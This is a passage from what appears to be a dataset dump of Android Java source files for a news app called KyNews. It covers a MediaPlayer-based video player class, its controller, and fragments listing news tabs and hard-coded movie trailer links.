**/\n public static final int STATE_BUFFERING_PAUSED = 6;\n public static final int STATE_COMPLETED = 7; // 播放完成\n\n public static final int PLAYER_NORMAL = 10; // 普通播放器\n public static final int PLAYER_FULL_SCREEN = 11; // 全屏播放器\n public static final int PLAYER_TINY_WINDOW = 12; // 小窗口播放器\n\n private int mCurrentState = STATE_IDLE;\n private int mPlayerState = PLAYER_NORMAL;\n\n private Context mContext;\n private FrameLayout mContainer;\n private TextureView mTextureView;\n private KyVideoPlayerController mController;\n private SurfaceTexture mSurfaceTexture;\n private String mUrl;\n private Map<String, String> mHeaders;\n private MediaPlayer mMediaPlayer;\n\n private int mBufferPercentage;\n\n public KyVideoPlayer(Context context) {\n this(context, null);\n }\n\n public KyVideoPlayer(Context context, AttributeSet attrs) {\n super(context, attrs);\n mContext = context;\n init();\n }\n\n private void init() {\n mContainer = new FrameLayout(mContext);\n mContainer.setBackgroundColor(Color.BLACK);\n LayoutParams params = new LayoutParams(\n ViewGroup.LayoutParams.MATCH_PARENT,\n ViewGroup.LayoutParams.MATCH_PARENT);\n this.addView(mContainer, params);\n }\n\n public void setUp(String url, Map<String, String> headers) {\n mUrl = url;\n mHeaders = headers;\n }\n\n public void setController(KyVideoPlayerController controller) {\n mController = controller;\n mController.setKyVideoPlayer(this);\n mContainer.removeView(mController);\n LayoutParams params = new LayoutParams(\n ViewGroup.LayoutParams.MATCH_PARENT,\n ViewGroup.LayoutParams.MATCH_PARENT);\n mContainer.addView(mController, params);\n }\n\n @Override\n public void start() {\n KyVideoPlayerManager.instance().releaseKyVideoPlayer();\n KyVideoPlayerManager.instance().setCurrentKyVideoPlayer(this);\n if (mCurrentState == STATE_IDLE || mCurrentState == STATE_ERROR\n || mCurrentState == STATE_COMPLETED) {\n initMediaPlayer();\n initTextureView();\n addTextureView();\n }\n }\n\n private void initMediaPlayer() {\n if (mMediaPlayer == null) {\n mMediaPlayer = new MediaPlayer();\n\n mMediaPlayer.setAudioStreamType(AudioManager.STREAM_MUSIC);\n mMediaPlayer.setScreenOnWhilePlaying(true);\n\n mMediaPlayer.setOnPreparedListener(mOnPreparedListener);\n mMediaPlayer.setOnVideoSizeChangedListener(mOnVideoSizeChangedListener);\n mMediaPlayer.setOnCompletionListener(mOnCompletionListener);\n mMediaPlayer.setOnErrorListener(mOnErrorListener);\n mMediaPlayer.setOnInfoListener(mOnInfoListener);\n mMediaPlayer.setOnBufferingUpdateListener(mOnBufferingUpdateListener);\n }\n }\n\n private void initTextureView() {\n if (mTextureView == null) {\n mTextureView = new TextureView(mContext);\n mTextureView.setSurfaceTextureListener(this);\n }\n }\n\n private void addTextureView() {\n mContainer.removeView(mTextureView);\n LayoutParams params = new LayoutParams(\n ViewGroup.LayoutParams.MATCH_PARENT,\n ViewGroup.LayoutParams.MATCH_PARENT);\n mContainer.addView(mTextureView, 0, params);\n }\n\n private MediaPlayer.OnPreparedListener mOnPreparedListener\n = new MediaPlayer.OnPreparedListener() {\n @Override\n public void onPrepared(MediaPlayer mp) {\n mp.start();\n mCurrentState = STATE_PREPARED;\n mController.setControllerState(mPlayerState, mCurrentState);\n }\n };\n\n private MediaPlayer.OnVideoSizeChangedListener mOnVideoSizeChangedListener\n = new MediaPlayer.OnVideoSizeChangedListener() {\n @Override\n public void onVideoSizeChanged(MediaPlayer mp, int width, int height) {\n\n }\n };\n\n private MediaPlayer.OnCompletionListener mOnCompletionListener\n = new MediaPlayer.OnCompletionListener() {\n @Override\n public void onCompletion(MediaPlayer mp) {\n mCurrentState = STATE_COMPLETED;\n mController.setControllerState(mPlayerState, mCurrentState);\n KyVideoPlayerManager.instance().setCurrentKyVideoPlayer(null);\n }\n };\n\n private MediaPlayer.OnErrorListener mOnErrorListener\n = new MediaPlayer.OnErrorListener() {\n @Override\n public boolean onError(MediaPlayer mp, int what, int extra) {\n mCurrentState = STATE_ERROR;\n mController.setControllerState(mPlayerState, mCurrentState);\n return false;\n }\n };\n\n private MediaPlayer.OnInfoListener mOnInfoListener\n = new MediaPlayer.OnInfoListener() {\n @Override\n public boolean onInfo(MediaPlayer mp, int what, int extra) {\n if (what == MediaPlayer.MEDIA_INFO_VIDEO_RENDERING_START) {\n // 播放器渲染第一帧\n mCurrentState = STATE_PLAYING;\n mController.setControllerState(mPlayerState, mCurrentState);\n } else if (what == MediaPlayer.MEDIA_INFO_BUFFERING_START) {\n // MediaPlayer暂时不播放,以缓冲更多的数据\n if (mCurrentState == STATE_PAUSED || mCurrentState == STATE_BUFFERING_PAUSED) {\n mCurrentState = STATE_BUFFERING_PAUSED;\n } else {\n mCurrentState = STATE_BUFFERING_PLAYING;\n }\n mController.setControllerState(mPlayerState, mCurrentState);\n } else if (what == MediaPlayer.MEDIA_INFO_BUFFERING_END) {\n // 填充缓冲区后,MediaPlayer恢复播放/暂停\n if (mCurrentState == STATE_BUFFERING_PLAYING) {\n mCurrentState = STATE_PLAYING;\n mController.setControllerState(mPlayerState, mCurrentState);\n }\n if (mCurrentState == STATE_BUFFERING_PAUSED) {\n mCurrentState = STATE_PAUSED;\n mController.setControllerState(mPlayerState, mCurrentState);\n }\n }\n return true;\n }\n };\n\n private MediaPlayer.OnBufferingUpdateListener mOnBufferingUpdateListener\n = new MediaPlayer.OnBufferingUpdateListener() {\n @Override\n public void onBufferingUpdate(MediaPlayer mp, int percent) {\n mBufferPercentage = percent;\n }\n };\n\n /**\n * 全屏,将mContainer(内部包含mTextureView和mController)从当前容器中移除,并添加到android.R.content中.\n */\n @Override\n public void enterFullScreen() {\n if (mPlayerState == PLAYER_FULL_SCREEN) return;\n\n // 隐藏ActionBar、状态栏,并横屏\n VideoUtil.hideActionBar(mContext);\n VideoUtil.scanForActivity(mContext)\n .setRequestedOrientation(ActivityInfo.SCREEN_ORIENTATION_LANDSCAPE);\n\n this.removeView(mContainer);\n ViewGroup contentView = (ViewGroup) VideoUtil.scanForActivity(mContext)\n .findViewById(android.R.id.content);\n LayoutParams params = new LayoutParams(\n ViewGroup.LayoutParams.MATCH_PARENT,\n ViewGroup.LayoutParams.MATCH_PARENT);\n contentView.addView(mContainer, params);\n\n mPlayerState = PLAYER_FULL_SCREEN;\n mController.setControllerState(mPlayerState, mCurrentState);\n }\n\n /**\n * 退出全屏,移除mTextureView和mController,并添加到非全屏的容器中。\n *\n * @return true退出全屏.\n */\n @Override\n public boolean exitFullScreen() {\n if (mPlayerState == PLAYER_FULL_SCREEN) {\n VideoUtil.showActionBar(mContext);\n VideoUtil.scanForActivity(mContext)\n .setRequestedOrientation(ActivityInfo.SCREEN_ORIENTATION_PORTRAIT);\n\n ViewGroup contentView = (ViewGroup) VideoUtil.scanForActivity(mContext)\n .findViewById(android.R.id.content);\n contentView.removeView(mContainer);\n LayoutParams params = new LayoutParams(\n ViewGroup.LayoutParams.MATCH_PARENT,\n ViewGroup.LayoutParams.MATCH_PARENT);\n this.addView(mContainer, params);\n\n mPlayerState = PLAYER_NORMAL;\n mController.setControllerState(mPlayerState, mCurrentState);\n return true;\n }\n return false;\n }\n\n /**\n * 进入小窗口播放,小窗口播放的实现原理与全屏播放类似。\n */\n @Override\n public void enterTinyWindow() {\n if (mPlayerState == PLAYER_TINY_WINDOW) return;\n this.removeView(mContainer);\n\n ViewGroup contentView = (ViewGroup) VideoUtil.scanForActivity(mContext)\n .findViewById(android.R.id.content);\n // 小窗口的宽度为屏幕宽度的60%,长宽比默认为16:9,右边距、下边距为8dp。\n LayoutParams params = new LayoutParams(\n (int) (VideoUtil.getScreenWidth(mContext) * 0.6f),\n (int) (VideoUtil.getScreenWidth(mContext) * 0.6f * 9f / 16f));\n params.gravity = Gravity.BOTTOM | Gravity.END;\n params.rightMargin = VideoUtil.dp2px(mContext, 8f);\n params.bottomMargin = VideoUtil.dp2px(mContext, 8f);\n\n contentView.addView(mContainer, params);\n\n mPlayerState = PLAYER_TINY_WINDOW;\n mController.setControllerState(mPlayerState, mCurrentState);\n }\n\n /**\n * 退出小窗口播放\n */\n @Override\n public boolean exitTinyWindow() {\n if (mPlayerState == PLAYER_TINY_WINDOW) {\n ViewGroup contentView = (ViewGroup) VideoUtil.scanForActivity(mContext)\n .findViewById(android.R.id.content);\n contentView.removeView(mContainer);\n LayoutParams params = new LayoutParams(\n ViewGroup.LayoutParams.MATCH_PARENT,\n ViewGroup.LayoutParams.MATCH_PARENT);\n this.addView(mContainer, params);\n\n mPlayerState = PLAYER_NORMAL;\n mController.setControllerState(mPlayerState, mCurrentState);\n return true;\n }\n return false;\n }\n\n @Override\n public void release() {\n if (mMediaPlayer != null) {\n mMediaPlayer.release();\n mMediaPlayer = null;\n }\n mContainer.removeView(mTextureView);\n if (mSurfaceTexture != null) {\n mSurfaceTexture.release();\n mSurfaceTexture = null;\n }\n if (mController != null) {\n mController.reset();\n }\n mCurrentState = STATE_IDLE;\n mPlayerState = PLAYER_NORMAL;\n }\n\n\n @Override\n public void restart() {\n if (mCurrentState == STATE_PAUSED) {\n mMediaPlayer.start();\n mCurrentState = STATE_PLAYING;\n mController.setControllerState(mPlayerState, mCurrentState);\n }\n if (mCurrentState == STATE_BUFFERING_PAUSED) {\n mMediaPlayer.start();\n mCurrentState = STATE_BUFFERING_PLAYING;\n mController.setControllerState(mPlayerState, mCurrentState);\n }\n }\n\n @Override\n public void pause() {\n if (mCurrentState == STATE_PLAYING) {\n mMediaPlayer.pause();\n mCurrentState = STATE_PAUSED;\n mController.setControllerState(mPlayerState, mCurrentState);\n }\n if (mCurrentState == STATE_BUFFERING_PLAYING) {\n mMediaPlayer.pause();\n mCurrentState = STATE_BUFFERING_PAUSED;\n mController.setControllerState(mPlayerState, mCurrentState);\n }\n }\n\n @Override\n public void seekTo(int pos) {\n if (mMediaPlayer != null) {\n mMediaPlayer.seekTo(pos);\n }\n }\n\n @Override\n public boolean isIdle() {\n return mCurrentState == STATE_IDLE;\n }\n\n @Override\n public boolean isPreparing() {\n return mCurrentState == STATE_PREPARING;\n }\n\n @Override\n public boolean isPrepared() {\n return mCurrentState == STATE_PREPARED;\n }\n\n @Override\n public boolean isBufferingPlaying() {\n return mCurrentState == STATE_BUFFERING_PLAYING;\n }\n\n @Override\n public boolean isBufferingPaused() {\n return mCurrentState == STATE_BUFFERING_PAUSED;\n }\n\n @Override\n public boolean isPlaying() {\n return mCurrentState == STATE_PLAYING;\n }\n\n @Override\n public boolean isPaused() {\n return mCurrentState == STATE_PAUSED;\n }\n\n @Override\n public boolean isError() {\n return mCurrentState == STATE_ERROR;\n }\n\n @Override\n public boolean isCompleted() {\n return mCurrentState == STATE_COMPLETED;\n }\n\n @Override\n public boolean isFullScreen() {\n return mCurrentState == PLAYER_FULL_SCREEN;\n }\n\n @Override\n public boolean isTinyWindow() {\n return mCurrentState == PLAYER_TINY_WINDOW;\n }\n\n @Override\n public boolean isNormal() {\n return mCurrentState == PLAYER_NORMAL;\n }\n\n @Override\n public int getDuration() {\n return mMediaPlayer != null ? mMediaPlayer.getDuration() : 0;\n }\n\n @Override\n public int getCurrentPosition() {\n return mMediaPlayer != null ? mMediaPlayer.getCurrentPosition() : 0;\n }\n\n @Override\n public int getBufferPercentage() {\n return mBufferPercentage;\n }\n\n @Override\n public void onSurfaceTextureAvailable(SurfaceTexture surface, int width, int height) {\n if (mSurfaceTexture == null) {\n mSurfaceTexture = surface;\n openMediaPlayer();\n } else {\n mTextureView.setSurfaceTexture(mSurfaceTexture);\n }\n }\n\n private void openMediaPlayer() {\n try {\n mMediaPlayer.setDataSource(mContext.getApplicationContext(), Uri.parse(mUrl), mHeaders);\n mMediaPlayer.setSurface(new Surface(mSurfaceTexture));\n mMediaPlayer.prepareAsync();\n mCurrentState = STATE_PREPARING;\n mController.setControllerState(mPlayerState, mCurrentState);\n } catch (IOException e) {\n e.printStackTrace();\n }\n }\n\n @Override\n public void onSurfaceTextureSizeChanged(SurfaceTexture surface, int width, int height) {\n\n }\n\n @Override\n public boolean onSurfaceTextureDestroyed(SurfaceTexture surface) {\n return mSurfaceTexture == null;\n }\n\n @Override\n public void onSurfaceTextureUpdated(SurfaceTexture surface) {\n\n }\n\n //////////////////////////////////////////////////////////////////\n //用于判断滑动方向,处理音量和视屏进度调节\n private float fx, fy, oldDx, lastX;\n private boolean isX, isY;\n private float startY = 0;//手指按下时的Y坐标\n private float startX = 0;//手指按下时的Y坐标\n\n private int dip2px(float dipValue) {\n final float scale = getContext().getResources().getDisplayMetrics().density;\n return (int) (dipValue * scale + 0.5f);\n }\n\n @Override\n public boolean onTouchEvent(MotionEvent event) {\n float x = event.getX();\n float y = event.getY();\n int screenWidth = dip2px(300);\n switch (event.getAction()) {\n case MotionEvent.ACTION_DOWN:\n\n startX = event.getX();\n startY = event.getY();\n break;\n case MotionEvent.ACTION_MOVE:\n\n float endY = event.getY();\n float distanceY = startY - endY;\n if (startX > screenWidth / 2) {\n //右边\n //在这里处理音量\n } else {\n //屏幕左半部分上滑,亮度变大,下滑,亮度变小\n final double FLING_MIN_DISTANCE = 0.5;\n final double FLING_MIN_VELOCITY = 0.5;\n if (distanceY > FLING_MIN_DISTANCE && Math.abs(distanceY) > FLING_MIN_VELOCITY) {\n setBrightness(10);\n }\n if (distanceY < FLING_MIN_DISTANCE && Math.abs(distanceY) > FLING_MIN_VELOCITY) {\n setBrightness(-10);\n }\n }\n break;\n case MotionEvent.ACTION_UP:\n break;\n }\n return false;\n }\n\n /*\n * 设置屏幕亮度\n * 0 最暗\n * 1 最亮\n */\n public void setBrightness(float brightness) {\n WindowManager.LayoutParams lp = ((Activity)mContext).getWindow().getAttributes();\n lp.screenBrightness = lp.screenBrightness + brightness / 255.0f;\n if (lp.screenBrightness > 1) {\n lp.screenBrightness = 1;\n } else if (lp.screenBrightness < 0.1) {\n lp.screenBrightness = (float) 0.1;\n }\n ((Activity)mContext).getWindow().setAttributes(lp);\n float sb = lp.screenBrightness;\n }\n}\n" }, { "alpha_fraction": 0.6523935198783875, "alphanum_fraction": 0.6561264991760254, "avg_line_length": 30.846153259277344, "blob_id": "1016b5bd77db6689ba02d53cbdf45aa11c719205", "content_id": "67052c0d8683660c158c46c5cdbdf9177ab41a9b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 4590, "license_type": "no_license", "max_line_length": 132, "num_lines": 143, "path": "/app/src/main/java/com/example/ky4910/kynews/view/fragment/NewsFragment.java", "repo_name": "ky4910/KyNews", "src_encoding": "UTF-8", "text": "package com.example.ky4910.kynews.view.fragment;\n\nimport android.os.Bundle;\nimport android.support.annotation.NonNull;\nimport android.support.annotation.Nullable;\nimport android.support.design.widget.TabLayout;\nimport android.support.v4.app.Fragment;\nimport android.support.v4.view.PagerAdapter;\nimport android.support.v4.view.ViewPager;\nimport android.view.LayoutInflater;\nimport android.view.View;\nimport android.view.ViewGroup;\nimport android.widget.TextView;\n\nimport com.example.ky4910.kynews.R;\nimport com.example.ky4910.kynews.adapter.NewsFragmentPageAdapter;\n\nimport butterknife.BindView;\nimport butterknife.ButterKnife;\n\npublic class NewsFragment extends Fragment{\n\n @BindView(R.id.tab_layout)\n TabLayout tabLayout;\n @BindView(R.id.view_pager)\n ViewPager viewPager;\n\n private PagerAdapter pagerAdapter;\n\n //tab titles\n private final int[] TAB_TITLES = new int[]{R.string.mainNews, R.string.sportsNews, R.string.techNews};\n\n @Override\n public void onCreate(@Nullable Bundle savedInstanceState) {\n super.onCreate(savedInstanceState);\n\n /*\n newTypes.add(\"要闻\");\n newTypes.add(\"娱乐\");\n newTypes.add(\"财经\");\n\n pagerAdapter = new MyFragmentPagerAdapter(getChildFragmentManager(), newTypes, mTabFragment);\n viewPager.setAdapter(pagerAdapter);\n */\n }\n\n @Nullable\n @Override\n public View onCreateView(@NonNull LayoutInflater inflater, @Nullable ViewGroup container, @Nullable Bundle savedInstanceState) {\n View view = inflater.inflate(R.layout.fragment_news, container, false);\n ButterKnife.bind(this, view);\n\n initPager();\n setTabs(tabLayout, getLayoutInflater(), TAB_TITLES);\n\n return view;\n }\n\n private void initPager() {\n pagerAdapter = new NewsFragmentPageAdapter(getFragmentManager());\n viewPager.setAdapter(pagerAdapter);\n\n viewPager.addOnPageChangeListener(new TabLayout.TabLayoutOnPageChangeListener(tabLayout));\n tabLayout.addOnTabSelectedListener(new TabLayout.OnTabSelectedListener() {\n @Override\n public void onTabSelected(TabLayout.Tab tab) {\n //取消平滑切换\n viewPager.setCurrentItem(tab.getPosition(), false);\n }\n\n @Override\n public void onTabUnselected(TabLayout.Tab tab) {\n\n }\n\n @Override\n public void onTabReselected(TabLayout.Tab tab) {\n\n }\n });\n }\n\n private void setTabs(TabLayout tabLayout, LayoutInflater inflater, int[] tabTitles){\n for (int i = 0; i < tabTitles.length; i++) {\n TabLayout.Tab tab = tabLayout.newTab();\n View view = inflater.inflate(R.layout.item_main_menu, null);\n tab.setCustomView(view);\n\n TextView tvTitle = view.findViewById(R.id.txt_tab);\n tvTitle.setText(tabTitles[i]);\n tabLayout.addTab(tab);\n }\n }\n}\n\n\n\n/*\n private void initPager() {\n pagerAdapter = new NewsFragmentPageAdapter(getSupportFragmentManager());\n viewPager.setAdapter(pagerAdapter);\n\n viewPager.addOnPageChangeListener(new TabLayout.TabLayoutOnPageChangeListener(tabLayout));\n tabLayout.addOnTabSelectedListener(new TabLayout.OnTabSelectedListener() {\n @Override\n public void onTabSelected(TabLayout.Tab tab) {\n //取消平滑切换\n viewPager.setCurrentItem(tab.getPosition(), false);\n }\n\n @Override\n public void onTabUnselected(TabLayout.Tab tab) {\n\n }\n\n @Override\n public void onTabReselected(TabLayout.Tab tab) {\n\n }\n });\n }\n\n private void setTabs(TabLayout tabLayout, LayoutInflater inflater, int[] tabTitles, int[] tabImages){\n for (int i = 0; i < tabImages.length; i++) {\n TabLayout.Tab tab = tabLayout.newTab();\n View view = inflater.inflate(R.layout.item_main_menu, null);\n tab.setCustomView(view);\n\n TextView tvTitle = (TextView)view.findViewById(R.id.txt_tab);\n tvTitle.setText(tabTitles[i]);\n ImageView imgTab = (ImageView)view.findViewById(R.id.img_tab);\n imgTab.setImageResource(tabImages[i]);\n tabLayout.addTab(tab);\n }\n }\n\n protected void initViews() {\n //create tab and pager fragment\n FragmentManager fragmentManager = getSupportFragmentManager();\n fragmentManager.beginTransaction().add(R.id.container, new NewsTabAndPagerFragment()).commit();\n }\n}\n*/\n" }, { "alpha_fraction": 0.5521860122680664, "alphanum_fraction": 0.6762698888778687, "avg_line_length": 42.010868072509766, "blob_id": "7c5931de3d3264231e39e34ccaec07d0aad1a909", "content_id": "3d5b9f0c33ef259fadc3d4c98b1cb9abc33d82be", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 4225, "license_type": "no_license", "max_line_length": 132, "num_lines": 92, "path": "/app/src/main/java/com/example/ky4910/kynews/view/fragment/VideoFragment.java", "repo_name": "ky4910/KyNews", "src_encoding": "UTF-8", "text": "package com.example.ky4910.kynews.view.fragment;\n\nimport android.os.Bundle;\nimport android.support.annotation.NonNull;\nimport android.support.annotation.Nullable;\nimport android.support.v4.app.Fragment;\nimport android.support.v7.widget.LinearLayoutManager;\nimport android.support.v7.widget.RecyclerView;\nimport android.view.LayoutInflater;\nimport android.view.View;\nimport android.view.ViewGroup;\n\nimport com.example.ky4910.kynews.R;\nimport com.example.ky4910.kynews.adapter.VideoRvAdapter;\nimport com.example.ky4910.kynews.model.entity.VideoBean;\n\nimport java.io.BufferedReader;\nimport java.io.IOException;\nimport java.io.InputStream;\nimport java.io.InputStreamReader;\nimport java.util.ArrayList;\nimport java.util.List;\n\n// http://api.m.mtime.cn/PageSubArea/TrailerList.api\n\npublic class VideoFragment extends Fragment {\n\n private View view;\n private RecyclerView recyclerView;\n private List<VideoBean> videoBeanList = new ArrayList<>();\n private VideoRvAdapter videoAdapter;\n\n public VideoFragment() {\n }\n\n @Override\n public void onCreate(@Nullable Bundle savedInstanceState) {\n super.onCreate(savedInstanceState);\n }\n\n @Nullable\n @Override\n public View onCreateView(@NonNull LayoutInflater inflater, @Nullable ViewGroup container, @Nullable Bundle savedInstanceState) {\n view = inflater.inflate(R.layout.fragment_videos, container, false);\n recyclerView = view.findViewById(R.id.video_rv);\n recyclerView.setLayoutManager(new LinearLayoutManager(getActivity()));\n initData();\n if (videoAdapter == null) {\n videoAdapter = new VideoRvAdapter(this.getActivity(), videoBeanList);\n recyclerView.setAdapter(videoAdapter);\n } else {\n videoAdapter.notifyDataSetChanged();\n }\n return view;\n }\n\n private void initData() {\n VideoBean bean1 = new VideoBean(\"《速度与激情:特别行动》曝全新中文预告\",\n \"http://img5.mtime.cn/mg/2019/06/29/002009.16684021_120X90X4.jpg\",\n \"http://vfx.mtime.cn/Video/2019/06/29/mp4/190629004821240734.mp4\");\n VideoBean bean2 = new VideoBean(\"《决战中途岛》预告再现海空激战\",\n \"http://img5.mtime.cn/mg/2019/06/27/231348.59732586_120X90X4.jpg\",\n \"http://vfx.mtime.cn/Video/2019/06/27/mp4/190627231412433967.mp4\");\n VideoBean bean3 = new VideoBean(\"小K领衔新版《霹雳娇娃》帅酷预告\",\n \"http://img5.mtime.cn/mg/2019/06/27/224744.68512147_120X90X4.jpg\",\n \"http://vfx.mtime.cn/Video/2019/06/28/mp4/190628075308350550.mp4\");\n VideoBean bean4 = new VideoBean(\"郑秀文《花椒之味》预告刘德华客串\",\n \"http://img5.mtime.cn/mg/2019/06/27/225551.29349352_120X90X4.jpg\",\n \"http://vfx.mtime.cn/Video/2019/06/27/mp4/190627225613276924.mp4\");\n VideoBean bean5 = new VideoBean(\"张晋《九龙不败》终极预告现飞龙出海\",\n \"http://img5.mtime.cn/mg/2019/06/27/104144.36321374_120X90X4.jpg\",\n \"http://vfx.mtime.cn/Video/2019/06/27/mp4/190627104751316049.mp4\");\n VideoBean bean6 = new VideoBean(\"伊恩麦克莱恩、海伦米伦《优秀的骗子》预告\",\n \"http://img5.mtime.cn/mg/2019/06/27/104649.48931556_120X90X4.jpg\",\n \"http://vfx.mtime.cn/Video/2019/06/27/mp4/190627104816316366.mp4\");\n VideoBean bean7 = new VideoBean(\"《铤而走险》大鹏欧豪雨夜亡命追击\",\n \"http://img5.mtime.cn/mg/2019/06/21/175640.99146689_120X90X4.jpg\",\n \"http://vfx.mtime.cn/Video/2019/06/21/mp4/190621175731672800.mp4\");\n VideoBean bean8 = new VideoBean(\"恐怖喜剧片《准备好了没》发红标预告\",\n \"http://img5.mtime.cn/mg/2019/06/18/231051.97747383_120X90X4.jpg\",\n \"http://vfx.mtime.cn/Video/2019/06/18/mp4/190618231303510938.mp4\");\n\n videoBeanList.add(bean1);\n videoBeanList.add(bean2);\n videoBeanList.add(bean3);\n videoBeanList.add(bean4);\n videoBeanList.add(bean5);\n videoBeanList.add(bean6);\n videoBeanList.add(bean7);\n videoBeanList.add(bean8);\n }\n}\n" }, { "alpha_fraction": 0.6015861630439758, "alphanum_fraction": 0.6043853759765625, "avg_line_length": 34.04359817504883, "blob_id": "217a77f34c63d54d0be4b002a7252b8941f81b4c", "content_id": "a474fc2677d14b898cd23a5f038bb165248bc9dc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 12931, "license_type": "no_license", "max_line_length": 92, "num_lines": 367, "path": "/app/src/main/java/com/example/ky4910/kynews/utils/KyVideoPlayerController.java", "repo_name": "ky4910/KyNews", "src_encoding": "UTF-8", "text": "package com.example.ky4910.kynews.utils;\n\nimport android.content.Context;\nimport android.os.CountDownTimer;\nimport android.support.annotation.DrawableRes;\nimport android.view.LayoutInflater;\nimport android.view.View;\nimport android.widget.FrameLayout;\nimport android.widget.ImageView;\nimport android.widget.LinearLayout;\nimport android.widget.SeekBar;\nimport android.widget.TextView;\nimport android.widget.Toast;\n\nimport com.bumptech.glide.Glide;\nimport com.bumptech.glide.request.RequestOptions;\nimport com.example.ky4910.kynews.R;\n\nimport java.util.Timer;\nimport java.util.TimerTask;\n\n/**\n * Created by kimber on 2019/07/16\n * Video Player Controller\n */\n\npublic class KyVideoPlayerController extends FrameLayout\n implements View.OnClickListener, SeekBar.OnSeekBarChangeListener {\n\n private Context mContext;\n private KyVideoPlayerControl mKyVideoPlayer;\n private ImageView mImage;\n private ImageView mCenterStart;\n private LinearLayout ll_mTop;\n private ImageView mBack;\n private TextView mTitle;\n\n private LinearLayout ll_mBottom;\n private ImageView mRestartPause;\n private TextView mPosition;\n private TextView mDuration;\n private SeekBar mSeek;\n private ImageView mFullScreen;\n\n private LinearLayout ll_mLoading;\n private TextView mLoadText;\n\n private LinearLayout ll_mError;\n private TextView mRetry;\n\n private LinearLayout ll_mCompleted;\n private TextView mReplay;\n private TextView mShare;\n\n private Timer mUpdateProgressTimer;\n private TimerTask mUpdateProgressTimerTask;\n private boolean topBottomVisible;\n private CountDownTimer mDismissTopBottomCountDownTimer;\n\n public KyVideoPlayerController(Context context) {\n super(context);\n mContext = context;\n init();\n }\n\n private void init() {\n LayoutInflater.from(mContext).inflate(R.layout.video_player_controller, this, true);\n\n mImage = findViewById(R.id.iv_image);\n mCenterStart = findViewById(R.id.center_start);\n\n ll_mTop = findViewById(R.id.ll_top);\n mBack = findViewById(R.id.iv_back);\n mTitle = findViewById(R.id.tv_title);\n\n ll_mBottom = findViewById(R.id.ll_bottom);\n mRestartPause = findViewById(R.id.iv_restart_pause);\n mPosition = findViewById(R.id.tv_position);\n mDuration = findViewById(R.id.tv_duration);\n mSeek = findViewById(R.id.seek);\n mFullScreen = findViewById(R.id.iv_full_screen);\n\n ll_mLoading = findViewById(R.id.ll_loading);\n mLoadText = findViewById(R.id.tv_loading);\n\n ll_mError = findViewById(R.id.ll_error);\n mRetry = findViewById(R.id.tv_retry);\n\n ll_mCompleted = findViewById(R.id.ll_completed);\n mReplay = findViewById(R.id.tv_replay);\n mShare = findViewById(R.id.tv_share);\n\n mCenterStart.setOnClickListener(this);\n mBack.setOnClickListener(this);\n mRestartPause.setOnClickListener(this);\n mFullScreen.setOnClickListener(this);\n mRetry.setOnClickListener(this);\n mReplay.setOnClickListener(this);\n mShare.setOnClickListener(this);\n mSeek.setOnSeekBarChangeListener(this);\n this.setOnClickListener(this);\n }\n\n public void setTitle(String title) {\n mTitle.setText(title);\n }\n\n public void setImage(String imageUrl) {\n Glide.with(mContext)\n .load(imageUrl)\n .apply(new RequestOptions().error(R.drawable.default_img))\n .into(mImage);\n }\n\n public void setImage(@DrawableRes int resId) {\n mImage.setImageResource(resId);\n }\n\n public void setKyVideoPlayer(KyVideoPlayerControl kyVideoPlayer) {\n mKyVideoPlayer = kyVideoPlayer;\n if (mKyVideoPlayer.isIdle()) {\n mBack.setVisibility(View.GONE);\n ll_mTop.setVisibility(View.VISIBLE);\n ll_mBottom.setVisibility(View.GONE);\n }\n }\n\n @Override\n public void onClick(View v) {\n if (v == mCenterStart) {\n if (mKyVideoPlayer.isIdle()) {\n mKyVideoPlayer.start();\n }\n } else if (v == mBack) {\n if (mKyVideoPlayer.isFullScreen()) {\n mKyVideoPlayer.exitFullScreen();\n } else if (mKyVideoPlayer.isTinyWindow()) {\n mKyVideoPlayer.exitTinyWindow();\n }\n } else if (v == mRestartPause) {\n if (mKyVideoPlayer.isPlaying() || mKyVideoPlayer.isBufferingPlaying()) {\n mKyVideoPlayer.pause();\n } else if (mKyVideoPlayer.isPaused() || mKyVideoPlayer.isBufferingPaused()) {\n mKyVideoPlayer.restart();\n }\n } else if (v == mFullScreen) {\n if (mKyVideoPlayer.isNormal()) {\n mKyVideoPlayer.enterFullScreen();\n } else if (mKyVideoPlayer.isFullScreen()) {\n mKyVideoPlayer.exitFullScreen();\n }\n } else if (v == mRetry) {\n mKyVideoPlayer.release();\n mKyVideoPlayer.start();\n } else if (v == mReplay) {\n mRetry.performClick();\n } else if (v == mShare) {\n Toast.makeText(mContext, \"分享\", Toast.LENGTH_SHORT).show();\n } else if (v == this) {\n if (mKyVideoPlayer.isPlaying()\n || mKyVideoPlayer.isPaused()\n || mKyVideoPlayer.isBufferingPlaying()\n || mKyVideoPlayer.isBufferingPaused()) {\n setTopBottomVisible(!topBottomVisible);\n }\n }\n }\n\n private void setTopBottomVisible(boolean visible) {\n ll_mTop.setVisibility(visible ? View.VISIBLE : View.GONE);\n ll_mBottom.setVisibility(visible ? View.VISIBLE : View.GONE);\n topBottomVisible = visible;\n if (visible) {\n if (!mKyVideoPlayer.isPaused() && !mKyVideoPlayer.isBufferingPaused()) {\n startDismissTopBottomTimer();\n }\n } else {\n cancelDismissTopBottomTimer();\n }\n }\n\n private void startDismissTopBottomTimer() {\n cancelDismissTopBottomTimer();\n if (mDismissTopBottomCountDownTimer == null) {\n mDismissTopBottomCountDownTimer = new CountDownTimer(8000, 8000) {\n @Override\n public void onTick(long millisUntilFinished) {\n\n }\n\n @Override\n public void onFinish() {\n setTopBottomVisible(false);\n }\n };\n }\n mDismissTopBottomCountDownTimer.start();\n }\n\n private void cancelDismissTopBottomTimer() {\n if (mDismissTopBottomCountDownTimer != null) {\n mDismissTopBottomCountDownTimer.cancel();\n }\n }\n\n public void setControllerState(int playerState, int playState) {\n switch (playerState) {\n case KyVideoPlayer.PLAYER_NORMAL:\n mBack.setVisibility(View.GONE);\n mFullScreen.setVisibility(View.VISIBLE);\n mFullScreen.setImageResource(R.drawable.ic_player_enlarge);\n break;\n case KyVideoPlayer.PLAYER_FULL_SCREEN:\n mBack.setVisibility(View.VISIBLE);\n mFullScreen.setVisibility(View.VISIBLE);\n mFullScreen.setImageResource(R.drawable.ic_player_shrink);\n break;\n case KyVideoPlayer.PLAYER_TINY_WINDOW:\n mFullScreen.setVisibility(View.GONE);\n break;\n }\n switch (playState) {\n case KyVideoPlayer.STATE_IDLE:\n break;\n case 